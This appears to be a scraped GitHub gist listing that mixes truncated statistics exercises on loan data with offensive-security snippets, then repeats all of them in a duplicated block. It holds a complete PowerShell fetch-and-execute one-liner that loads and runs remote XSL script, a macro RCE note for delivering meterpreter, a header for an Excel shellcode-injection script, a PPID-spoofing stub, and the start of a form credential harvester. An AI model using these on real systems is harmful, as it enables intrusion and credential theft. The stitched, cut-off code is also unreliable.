joeleonjr

## prob.py
import collections
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
import scipy.stats as stats

data = [1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 3, 4, 4, 4, 4, 5, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7, 8, 8, 9, 9]

c = collections.Counter(data)

## prob_lending_club.py
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import pandas as pd
import scipy.stats as stats

loansData = pd.read_csv('https://github.com/Thinkful-Ed/curric-data-001-data-sets/raw/master/loans/loansData.csv')
loansData.dropna(inplace=True)

print(loansData.describe())

## chi_squared.py
from scipy import stats
import collections
import pandas as pd

loansData = pd.read_csv('https://github.com/Thinkful-Ed/curric-data-001-data-sets/raw/master/loans/loansData.csv')

loansData.dropna(inplace=True)

freq = collections.Counter(loansData['Open.CREDIT.Lines'])

## linear_regression.py
import pandas as pd
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import scipy.stats as stats
import numpy as np
import statsmodels.api as sm

loansData = pd.read_csv('https://github.com/Thinkful-Ed/curric-data-001-data-sets/raw/master/loans/loansData.csv')

## logistic_regression.py
import pandas as pd
import statsmodels.api as sm
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import numpy as np
import sys


def logit_function(x):

## PowerShell.txt
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]

## Various-Macro-Based-RCEs.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                joeleonjr
                / Various-Macro-Based-RCEs.md
            
            
              Created
              April 29, 2020 21:47
                — forked from mgeeky/Various-Macro-Based-RCEs.md
            
              
                Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.
              
          
    This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector.
Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.
All of the below examples had been generated for using as a remote address: 192.168.56.101.
List:

Page substiution macro for luring user to click Enable Content
The Unicorn Powershell based payload


## Invoke-Excel4DCOM64.ps1
#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank,
#	  x64 support by  Philip Tsukerman (@PhilipTsukerman) / Cybereason,
#	  Excel version detection by Joe Leon (@JoeLeonJr) / FortyNorth Security
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************


## PPID Spoof & BlockDLLs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace BlockDllTest
{
    class Program
    {
        static void Main(string[] args)
        {

## credharvest.js
//The window "load" event is fired when the whole page has loaded,
//including all dependent resources such as stylesheets and images.
//Read more: https://developer.mozilla.org/en-US/docs/Web/API/Window/load_event
window.addEventListener("load", function() {

  //This assumes the target form is the first on the page, if not change the index.
  //Attaching to the "submit" event on that form
  document.forms[0].addEventListener("submit", function(e) {

    //Prevent the default form submit
	import collections
	import matplotlib
	matplotlib.use('TkAgg')
	import matplotlib.pyplot as plt
	import matplotlib.mlab as mlab
	import scipy.stats as stats

	data = [1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 3, 4, 4, 4, 4, 5, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7, 8, 8, 9, 9]

	c = collections.Counter(data)
	from scipy import stats
	import collections
	import pandas as pd

	loansData = pd.read_csv('https://github.com/Thinkful-Ed/curric-data-001-data-sets/raw/master/loans/loansData.csv')

	loansData.dropna(inplace=True)

	freq = collections.Counter(loansData['Open.CREDIT.Lines'])
	import pandas as pd
	import statsmodels.api as sm
	import matplotlib
	matplotlib.use('TkAgg')
	import matplotlib.pyplot as plt
	import numpy as np
	import sys


	def logit_function(x):
	##############################################################################
	### Powershell Xml/Xsl Assembly "Fetch & Execute"
	### [https://twitter.com/bohops/status/966172175555284992]

	$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

	##############################################################################
	### Powershell VBScript Assembly SCT "Fetch & Execute"
	### [https://twitter.com/bohops/status/965670898379476993]
	#**********************************************************************
	# Invoke-Excel4DCOM64.ps1
	# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
	# Author: Stan Hegt (@StanHacked) / Outflank,
	# x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason,
	# Excel version detection by Joe Leon (@JoeLeonJr) / FortyNorth Security
	# Date: 2019/04/21
	# Version: 1.1
	#**********************************************************************
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;

	namespace BlockDllTest
	{
	class Program
	{
	static void Main(string[] args)
	{
	//The window "load" event is fired when the whole page has loaded,
	//including all dependent resources such as stylesheets and images.
	//Read more: https://developer.mozilla.org/en-US/docs/Web/API/Window/load_event
	window.addEventListener("load", function() {

	//This assumes the target form is the first on the page, if not change the index.
	//Attaching to the "submit" event on that form
	document.forms[0].addEventListener("submit", function(e) {

	//Prevent the default form submit